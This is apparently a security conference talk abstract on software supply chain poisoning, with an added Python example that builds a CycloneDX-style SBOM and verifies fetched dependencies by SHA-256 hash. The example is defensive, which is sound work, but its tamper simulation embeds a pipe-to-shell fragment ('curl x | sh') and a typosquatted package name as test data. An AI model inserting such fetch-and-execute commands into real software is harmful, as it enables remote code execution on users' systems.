
Supply Chain Poisoning: Breaking Trust in Modern Software Delivery

The software supply chain has become prime territory for sophisticated attacks, as demonstrated by recent high-impact incidents like the 3CX compromise affecting 18 million users and the Okta breach impacting 150 organizations. This technical session explores how attackers exploit modern application dependencies, build processes, and distribution channels.
Through live demonstrations, we'll examine attack vectors including package registry manipulation, build system compromises, code signing certificate theft, and repository poisoning. We'll analyze real-world cases like the PyPI repository attacks and the Codecov breach to understand attacker methodologies and their cascading impacts across the development ecosystem.

Key areas covered:
1. Package registry exploitation techniques
2. Build pipeline compromise methods
3. Code signing infrastructure attacks
4. Repository poisoning strategies
5. SBOM implementation
6. Binary attestation systems
7. Automated dependency scanning
8. Secure build pipeline architecture
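As an added example of the SBOM and artifact-verification topics above (this is not the speaker's code and is not from the session materials), the Python below generates a minimal CycloneDX-shaped SBOM with SHA-256 hashes for a set of build inputs and then verifies a later fetch of those inputs against it. The package names, purls and artifact bytes are constructed for the example; `tampered_scenario()` simulates the failure modes a poisoned registry or repository produces: a modified artifact, an extra dependency that was never in the SBOM, and an SBOM entry generated without a hash.

```python
"""Verify fetched dependencies against a CycloneDX-style SBOM (added example)."""
import hashlib
import json
from typing import Dict, List

# Constructed stand-ins for downloaded wheels, sdists and tarballs.
# The purls and package names are hypothetical.
ARTIFACTS: Dict[str, bytes] = {
    "pkg:pypi/leftpad-clone@1.2.0": b"leftpad-clone-1.2.0 wheel bytes",
    "pkg:pypi/yaml-fast@0.9.3": b"yaml-fast-0.9.3 sdist bytes",
    "pkg:npm/color-helper@2.0.1": b"color-helper-2.0.1 tarball bytes",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_sbom(artifacts: Dict[str, bytes]) -> dict:
    """Record each artifact as a CycloneDX 1.5-shaped component with its SHA-256."""
    components = []
    for purl, data in artifacts.items():
        name, version = purl.split("/")[-1].split("@")
        components.append({
            "type": "library",
            "name": name,
            "version": version,
            "purl": purl,
            "hashes": [{"alg": "SHA-256", "content": sha256_hex(data)}],
        })
    return {"bomFormat": "CycloneDX", "specVersion": "1.5", "components": components}


def verify_artifacts(sbom: dict, fetched: Dict[str, bytes]) -> List[str]:
    """Return human-readable findings; an empty list means every input checks out."""
    findings: List[str] = []
    recorded = {c["purl"]: c for c in sbom.get("components", [])}
    for purl, data in fetched.items():
        comp = recorded.get(purl)
        if comp is None:
            # A dependency that is not in the SBOM: typosquat, dependency confusion,
            # or a transitive package injected by a poisoned upstream.
            findings.append(f"{purl}: not in SBOM (unexpected dependency)")
            continue
        expected = [h["content"] for h in comp.get("hashes", []) if h.get("alg") == "SHA-256"]
        if not expected:
            # An SBOM without hashes only names things; it cannot detect substitution.
            findings.append(f"{purl}: SBOM records no SHA-256 hash")
            continue
        actual = sha256_hex(data)
        if actual not in expected:
            findings.append(
                f"{purl}: hash mismatch (expected {expected[0][:12]}..., got {actual[:12]}...)"
            )
    for purl in recorded:
        if purl not in fetched:
            findings.append(f"{purl}: listed in SBOM but missing from build inputs")
    return findings


def tampered_scenario() -> List[str]:
    """Simulate a poisoned fetch against an SBOM built from the clean inputs."""
    sbom = build_sbom(ARTIFACTS)
    # A lazy SBOM generator that omitted the hash for one component.
    sbom["components"][0]["hashes"] = []
    fetched = dict(ARTIFACTS)
    # The registry now serves a modified sdist for one pinned version.
    fetched["pkg:pypi/yaml-fast@0.9.3"] = ARTIFACTS["pkg:pypi/yaml-fast@0.9.3"] + b"; curl x | sh"
    # A typosquatted package appears that the SBOM never recorded.
    fetched["pkg:pypi/yaml-fastt@0.9.3"] = b"typosquat payload"
    return verify_artifacts(sbom, fetched)


if __name__ == "__main__":
    print(json.dumps(build_sbom(ARTIFACTS), indent=2))
    for finding in tampered_scenario():
        print("FAIL:", finding)
```

The check is deliberately strict about hashless entries: an SBOM that only lists names and versions records what the build claims to have used, but without a digest (or a signed attestation over one) it cannot tell a pinned version from a substituted artifact served under the same version string.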

This Red Track presentation includes technical demonstrations of both attack techniques and defensive tooling. Attendees will gain practical knowledge in identifying vulnerable dependencies, implementing secure build processes, and establishing robust verification systems for their development infrastructure.
Aimed at offensive security researchers and defenders alike, the session leaves attendees with actionable insights for securing their software supply chain against sophisticated attacks.

Chaitanya Rahalkar

Software Security Engineer at Block Inc. (f.k.a. Square Inc.)

Austin, Texas, United States

